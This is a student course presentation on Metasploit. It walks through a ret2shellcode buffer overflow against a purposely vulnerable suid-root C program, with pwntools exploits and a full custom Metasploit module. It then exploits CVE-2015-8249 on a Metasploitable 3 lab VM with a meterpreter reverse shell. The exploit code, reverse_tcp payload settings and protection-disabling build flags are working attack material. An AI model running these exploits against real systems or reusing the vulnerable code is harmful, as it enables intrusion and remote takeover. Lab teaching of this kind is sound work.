--- # System prepended metadata title: Hacking Technology - Final Presentation tags: [' hack', nsysu] --- --- title: Hacking Technology - Final Presentation tags: nsysu, hack description: hacker class final project slideOptions: themem: Moon transition: slide parallaxBackgroundImage: "https://i.imgur.com/9MKTZRF.jpg" --- Deeply Studying Metasploit framework === --- # Metasploit framework
第一組
1. B043040006 謝文仁
2. B043040020 張哲魁
3. B043040036 滕熙評
4. B043040043 朱晉廷
指導教授: 王智弘
--- # Agenda - Write your own metasploit module - Attack Metasploitable 3 - Windows Server 2008 - Backdoor on Android using metasploit --- # Write your own metasploit module --- # Abstract 把撰寫好的 payload,整合進 metasploit framework。 以 buffer overflow 為例,將自己寫的漏洞放入 victim,寫好 payload,並整合到 metasploit 裡。 --- # Environment and tools - Attacker: 1. OS: mac osx 10.13.6 2. Metasploit: 5.0.25 - Victim: 1. OS: Ubuntu 14.04 2. gcc: 4.8.4 - Network: - In the same subnet. --- # Vulnerable Program A buffer overflow program with TCP socket connection. ```c=1 char sp[1024]; ``` ```c=48 /* start vulnerable read, ret2shellcode */ printf("shellcode:"); read(cli_fd, sp, 1024); printf("The shellcode recv is:%s\n", sp); printf("overflow here:"); char buf[20]; // VULNERABLE PLACE!! Didn't restrict the range read(cli_fd, buf, 0xffffffff); /* ----- */ printf("the buf recv is:%s\n", buf); /* end of vulnerable read */ ``` ---- ## Disabled Protections

Set suid to get root premission.

Compile with these flags. ```Makefile= SRC=vuln.c EXEC=vuln CC=gcc CCFLAG=-g -m32 -fno-stack-protector -z execstack -o all: ${CC} ${CCFLAG} ${EXEC} ${SRC} sudo chown root ${EXEC} sudo chgrp root ${EXEC} sudo chmod +s ${EXEC} clean: rm -f ${EXEC} ``` ---- ## Final Protections ---- ## Payload - 1 Return to char sp[1024] address (0x0804a080), where the place we inserted the shellcode. Ruby version: ```ruby= require 'pwn' context.arch = 'i386' z = Sock.new '192.168.56.101', ARGV[0] shellcode = "\x6a\x66\x58\x6a\x01\x5b\x31\xf6 ... " z.sendline buf address = 0x0804a080 # return address payload = "a"*80 + p32(address) z.write payload z.interact ``` ---- ## Payload - 2 Python version: ```python= from pwn import * import sys host, port = '192.168.56.101', int(sys.argv[1]) r = remote(host, port) # shellcode from package - pwn r.sendline(asm(shellcraft.sh())) address = 0x0804a080 # return address payload = "a"*80 + p32(address) r.sendline(payload) r.interactive() ``` --- # Exploit Result - victim Shellcode: Reverse TCP at port 1337 Victim, bind at port 8888, will open a backdoor on port 1337 ![](https://i.imgur.com/kPRIPF3.png) ![](https://i.imgur.com/cVs5ggK.png) ---- ## Exploit Result - attacker Attacker, connect success at port 1337 (victim ip=192.168.56.101) ![](https://i.imgur.com/IXIGkUF.png) ![](https://i.imgur.com/s2wVYUE.png) --- # Integrate to Metasploit - Start to wirte my own metasploit module! - Official Template: [Metasploit Github](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit) - 基本上照著那個 template 寫就可以了 ---- ## Module functions 1 - 有幾個重點 function: - `initialize()`: Where metadata placed. - 可以根據不同的平台去設定 payload,return address 等等。 - 其他相關的資訊都會放在這 (ex: License, Name, ...) ---- ## Module functions 2 - `exploit()`: Main function of exploit. 1. connect 2. send payload 3. handler 4. disconnect ---- ## Whole Module ```ruby= ## # This module requires Metasploit ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'hacker class ret2shellcode buffer overflow', 'Description' => %q| This is a module for buffer overflow of a simple program vuln, only works on this binary, create for hacker class final project. |, 'Author' => 'haruna', 'References' => [ [ 'URL', 'https://github.com/scwuaptx/HITCON-Training' ], ], 'Platform' => 'linux', 'Payload' => { }, 'Arch' => [ARCH_X86], 'Targets' => [ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Ret' => 0x0804a080 } ] ], 'DefaultTarget' => 0 )) end # Returns that the remote host is always vulnerable def check return Exploit::CheckCode::Vulnerable end def exploit connect print_status("Sending #{payload.encoded.length} byte payload...") # send shellcode print_status("Sending payload...:" + payload.encoded) p = payload.encoded sock.put(p) # Build the buffer for transmission, return to the shellcode place. buf = "A" * 80 # offset = 80 bytes buf += [ target.ret ].pack('V') # pack('V'), means 32-bit little endian print_status("Sending:" + buf) sock.put(buf) handler disconnect end end ``` --- # Metasploit Result - victim Victim still bind at port 8888 ... ![](https://i.imgur.com/9Dr4oh5.png) ---- ## Metasploit Result - attacker 1 Enter msfconsole and initialize settings ... My module is placed at `exploit/unix/bof1` | who? | IP | PORT | metasploit | | ---- | -- | ---- | ------------- | | Attacker | 192.168.56.1 | 12345 | LHOST / LPORT | | Victim | 192.168.56.101 | 8888 | RHOST / RPORT | ---- ## Metasploit Result - attacker 2 After setting ... ``` msf5 exploit(unix/bof1) > show info Name: hacker class ret2shellcode buffer overflow Module: exploit/unix/bof1 Platform: Linux Arch: x86 Privileged: No License: Metasploit Framework License (BSD) Rank: Manual Provided by: haruna Available targets: Id Name -- ---- 0 Linux x86 Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.56.101 yes The target address range or CIDR identifier RPORT 8888 yes The target port (TCP) Payload information: Description: This is a module for buffer overflow of a simple program vuln, only works on this binary, create for hacker class final project. References: https://github.com/scwuaptx/HITCON-Training ``` ---- ## Metasploit Result - attacker 3 Next, set payload ... 我們可以直接用 metasploit 裡面的 payload 產生 shellcode,不用像自己寫 exploit 要自己上網找或是用其他工具生成。(其實也可以用 `msfvenom`) ---- ## Metasploit Result - attacker 4 ```shell= set payload linux/x86/shell/reverse_tcp ``` ``` msf5 exploit(unix/bof1) > set payload linux/x86/shell/reverse_tcp payload => linux/x86/shell/reverse_tcp msf5 exploit(unix/bof1) > show options Module options (exploit/unix/bof1): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.56.101 yes The target address range or CIDR identifier RPORT 8888 yes The target port (TCP) Payload options (linux/x86/shell/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.56.1 yes The listen address (an interface may be specified) LPORT 12345 yes The listen port Exploit target: Id Name -- ---- 0 Linux x86 ``` ---- ## Metasploit Result - attacker 4 Finally, exploit! ![](https://i.imgur.com/XjAi7Ij.png) --- # DEMO --- # Refernece 1. [HITCON Training](https://github.com/scwuaptx/HITCON-Training) 2. [Module Example](https://taishi8117.github.io/2016/07/24/bof-metasploit/) 3. [Shell codes](http://shell-storm.org/shellcode/) 4. [Metasploit Github Wiki](https://github.com/rapid7/metasploit-framework/wiki) --- # Metasploitable3 - windows server 2008 --- # Abstract Exploit on Metasploitale3 - Microsoft Windows Server 2008 Github Page: [Metasploitable 3](https://github.com/rapid7/metasploitable3) --- # Metasploitable 3 一個 VM,提供了 ubuntu 14.04 和 windows server 2008 兩種,可以自行選擇要 build 哪個。 上面留有一些漏洞可供攻擊。 --- # Scan Vulnerablilities Use `nmap`, flags: probe **ALL** ports to determine service info ``` $ nmap -sV -p- 192.168.56.103 Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 00:01 CST Nmap scan report for 192.168.56.103 Host is up (0.0033s latency). Not shown: 65516 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd 22/tcp open ssh OpenSSH 7.1 (protocol 2.0) 80/tcp open http Microsoft IIS httpd 7.5 1617/tcp open rmiregistry Java RMI 4848/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 8020/tcp open http Apache httpd 8022/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8027/tcp open unknown 8080/tcp open http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8) 8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8383/tcp open ssl/http Apache httpd 8484/tcp open http Jetty winstone-2.8 8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2) 9200/tcp open http Elasticsearch REST API 1.1.1 (name: Eric Williams; Lucene 4.7) 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49179/tcp open rmiregistry Java RMI 49205/tcp open tcpwrapped Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 268.44 seconds ``` ---- ## Vulnerabilities 1 We can see a lot of http port is opened. Try port 8020, a http service. ---- ## Vulnerablilities 2 - There's a "ManageEngine Desktop Central" version 9 on it. - 一個提供遠端 Windows 桌面管理的工具 - Search whether this version is vulernable or not. ---- ## Vulnerablilities 3 - Lucky! Got a CVE-2015-8249, [Reference at NIST PAGE](https://nvd.nist.gov/vuln/detail/CVE-2015-8249) - 這個漏洞出在該軟體第九版中的一個 class `FileUploadServlet` 中的一個 parameter `computerName`,並沒有對他做完整的檢查,造成 path injection attack,Attacker 可以遠端執行代碼。 ---- ## Vulnerabilities 4 - 下面這個是 Rapid 7 的 Blog,有詳細的 payload write-up。 [Blog](https://blog.rapid7.com/2015/12/14/r7-2015-22-manageengine-desktop-central-9-fileuploadservlet-connectionid-vulnerability-cve-2015-8249/) - Metasploit 裡就有此漏洞的 module 了。 - exploit/windows/http/manageengine_connectionid_write --- # Exploit on Metasploit 1 parameter config: ```shell= use exploit/windows/http/manageengine_connectionid_write set payload windows/meterpreter/reverse_tcp set RHOST 192.168.56.103 RPORT 8020 set LHOST 192.168.56.1 LPORT 4444 ``` ---- ## Exploit on Metasploit 2 完整設定: ---- ## Exploit on Metasploit 3 Exploit! 成功拿到 meterpreter shell。 ![](https://i.imgur.com/UnhpDgf.png) --- # Protections 升級版本 or 上 patch 以上的 exploit 在 version 9, build 91093 後就無效了 而裝新版本的話,目前的最新版是第十版 --- # DEMO